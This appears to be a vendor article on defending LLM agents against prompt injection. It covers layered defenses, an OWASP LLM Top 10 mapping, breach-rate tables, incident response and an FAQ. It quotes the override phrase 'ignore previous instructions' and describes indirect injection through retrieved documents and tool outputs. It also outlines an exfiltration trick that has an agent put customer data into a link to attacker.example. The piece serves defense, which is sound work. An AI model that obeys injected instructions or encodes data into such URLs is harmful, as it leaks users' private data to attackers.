The attack surface in 2026
Prompt injection has matured from a research curiosity to a production threat. Adversaries don't write "ignore previous instructions" anymore - they poison retrievable corpora, hide instructions in tool outputs, and chain low-trust inputs into high-trust actions. Direct prompt injection is the easy case; indirect injection is what kills agents.
Anthropic, OpenAI, and academic groups all publish red-team data showing single-layer defenses (system prompt + best-of-class model) breach rates in the 35–60% range against capable adversaries [1]. Layered defenses bring this to single digits.
Mapping to the OWASP LLM Top 10
OWASP's Top 10 for LLM applications [3] formalizes the threat model that production teams now ship against. Every finding from a serious red-team exercise maps cleanly into one of these categories - which is exactly the point. The Top 10 is the shared vocabulary risk teams, security engineers, and AI engineers use to scope defenses.
Practical implication: catalog your eval suite by OWASP category. The model risk team gets a coverage map; the engineering team gets a prioritized backlog. We see most production agents covering 6–7 of the Top 10 well and 3–4 weakly - the gap is usually LLM06 (sensitive information disclosure) and LLM08 (excessive agency).
| Category | Risk | Primary defense layer |
|---|---|---|
| LLM01 | Prompt injection (direct + indirect) | Application + eval (red-team) |
| LLM02 | Insecure output handling | Application (output schemas) |
| LLM03 | Training data poisoning | Provider (model selection) |
| LLM04 | Model denial of service | Gateway (rate + cost caps) |
| LLM05 | Supply chain vulnerabilities | Provider + sub-processor list |
| LLM06 | Sensitive info disclosure | Gateway (PII / exfil filters) |
| LLM07 | Insecure plugin design | Application (tool schemas + idempotency) |
| LLM08 | Excessive agency | Application (action allow-list + HITL) |
| LLM09 | Overreliance | UX (citations, refusals, undo) |
| LLM10 | Model theft | Infrastructure (egress controls) |
View data table· Source: Anthropic + academic red-team data 2024–2025; Techimax engagement red-team
| Series | % breached |
|---|---|
| No defenses | 64 |
| + System prompt only | 41 |
| + Output schema validation | 24 |
| + Gateway PII/exfil filters | 12 |
| + Eval-suite red-team cases | 4 |
- Provider layer
Pick a model with strong refusal calibration. Anthropic and OpenAI lead on this benchmark in 2026; open-weight models lag without fine-tuning.
- Application layer
Output schemas (Zod or equivalent) reject tool-call attempts that fall outside the contract. Strict validators are guardrails the prompt can't bypass.
- Gateway layer
PII redaction, exfiltration filters (no URLs, no embedded HTML, no full account numbers), prompt-allow-list patterns. Gateway sees every request; prompt-level instructions don't.
- Eval layer
Every red-team finding becomes an eval case. The eval suite is the regression test for prompt injection. Pass-rate on the red-team suite gates production deploys.
Indirect injection: the harder case
Indirect injection happens when an agent reads from a corpus or tool output that an attacker can influence - a customer-facing knowledge base, a third-party CRM record, a webpage the agent retrieves. The attacker's payload is never typed by them; it's seeded into the corpus and waits.
Defenses that work: separate trusted (system, developer-controlled) from untrusted (retrieved, tool-output) content explicitly in the prompt structure; cap untrusted-content influence on tool calls; never let untrusted content propose tools or change tool arguments. Anthropic's structured prompting and OpenAI's tool-call discipline both support this pattern.
// The model proposes a refund_amount of $9000 because the
// retrieved doc said \"customer is owed all charges.\" The schema
// enforces the policy regardless.
const result = await refundTool.callWithValidation({
proposed: agentDecision,
// The schema (defined elsewhere) caps refund_amount and requires
// a reason from a fixed enum. Both fail closed on injection.
});
if (!result.allowed) {
// Log the denied call to the audit + eval system. Pages on-call
// if denied calls spike (signal of injection campaign).
audit.logDenied(result);
return await escalateToHuman(originalRequest);
}Exfiltration: the quiet failure mode
Exfiltration attacks coerce the agent to leak sensitive data - typically by chaining retrieval ("summarize this customer's full ticket history") with output ("format as a markdown link to https://attacker.example/?data=..."). Without gateway-level URL filters, this works.
Counter: gateway-level rules that strip outbound URLs from non-trusted-output paths; mark every retrieved field with a sensitivity tag; refuse to format sensitive fields into URL parameters. None of these defenses live in the prompt.
View data table· Source: Techimax incident response logs; cross-referenced with public OWASP advisories
| Series | Value |
|---|---|
| Indirect via retrieved doc | 38 |
| Indirect via tool output | 21 |
| Direct user input | 17 |
| Multimodal (image text) | 11 |
| Email / inbound message | 8 |
| Voice transcription | 5 |
Red-team cadence: how often is enough?
We default to quarterly structured red-team exercises plus continuous automated red-teaming. Each session generates new eval cases that compound into the regression suite - the eval suite gets harder over time, automatically. Skipping red-teaming for a quarter is the leading indicator of a future incident.
Structured: 90-minute session with a security engineer + a senior AI engineer. Document everything that worked. Add cases to the eval suite. Continuous: an automated harness that fuzzes the agent with known injection patterns nightly and surfaces successful breaches into the eval review queue.
Incident response: what to do when (not if) injection succeeds
Even with layered defenses, breaches happen. The mean time to detect (MTTD) for a prompt-injection campaign in our incident data: 6 hours when alarms are wired correctly; 11 days when they aren't. The difference is the alarm on tool-call denial-rate spikes - adversarial campaigns trigger the schema-validation layer at unusual rates before they succeed at exfiltration.
Playbook: kill-switch the affected agent surface; quarantine the trace; harvest cases into the eval suite; recalibrate defenses; document the incident with the security team. Run a drill quarterly so the response is muscle memory, not improvisation.
| Phase | Action | Owner | SLA |
|---|---|---|---|
| Detect | Alarm on denial-rate spike or PII-filter trigger | On-call engineer | Continuous |
| Contain | Engage agent kill-switch; route to fallback | On-call + security | < 15 min |
| Quarantine | Snapshot traces; preserve context for forensics | Security engineer | < 1h |
| Eradicate | Patch defenses; add eval cases; deploy fix | Engineering pod | < 24h |
| Recover | Lift kill-switch; canary 10% → 100% with eval gating | Engineering + product | 24–72h |
| Post-mortem | Blameless review; document; share with risk team | Engineering lead | < 5 business days |
"Asking nicely" doesn't survive contact with adversaries. The defenses that work validate behavior, not promises. Out-of-band, layered, evidence-based - or it isn't a defense.
References
- [1]Indirect prompt injection benchmarks - Anthropic Trust & Safety (2024)
- [2]Red-teaming generative AI - OpenAI safety (2024)
- [3]OWASP Top 10 for LLM applications - OWASP (2024)
- [4]Cost of a Data Breach Report 2024 - IBM Security (2024)
- [5]MITRE ATLAS - Adversarial Threat Landscape for AI Systems - MITRE (2024)
- [6]AI Risk Management Framework Generative AI Profile - NIST (2024)
Frequently asked questions
Are guardrail libraries (Guardrails AI, NeMo Guardrails) sufficient?
Useful as one layer; not sufficient alone. Combine with the application-level (schemas) and eval-level (red-team cases) layers for production. We use them when they fit; we don't depend on them as the only defense.
How often should we red-team?
Quarterly minimum; on every major prompt or model change. Each red-team session generates new eval cases that compound. Drift in red-team pass-rate signals model or corpus changes that require attention.
What about prompt-injection-in-images / multimodal attacks?
Real and increasingly common in 2026. Apply the same four-layer pattern: model-level (capable refusal on text-in-image), gateway (OCR scrub for known injection patterns), schema-level enforcement on tool calls regardless of modality, and eval cases that include multimodal payloads.
Can we publish our system prompt?
Generally fine. Adversaries reverse-engineer it anyway. The defenses that matter are out-of-band; the system prompt is not the security boundary.
How do we measure red-team coverage?
Two metrics: case count by OWASP LLM category (target: 10+ cases per category at production maturity), and pass-rate on the red-team suite (target: ≥ 96% at production maturity). The pass-rate must hold under model swaps and prompt changes - that's why eval-gated CI is non-negotiable.
Should the red-team be internal or external?
Both. Internal red-team understands your domain and finds business-logic-specific injections. External red-team brings adversarial creativity and benchmark calibration. Run both at least once a year; combine findings into the eval suite.
What's the cost of layered defenses?
Single-digit milliseconds added latency for gateway filtering and schema validation. Roughly 8–12% engineering effort during initial build for proper layering. The cost of the alternative - a public exfiltration incident - is orders of magnitude higher [4].
How does MCP (Model Context Protocol) affect the threat model?
MCP standardizes tool discovery and invocation; same prompt-injection threat model applies. Schema validation and tool-call validators sit on the MCP server side and apply identically. We treat MCP-based agents as no more or less risky than custom agents - the discipline is what matters.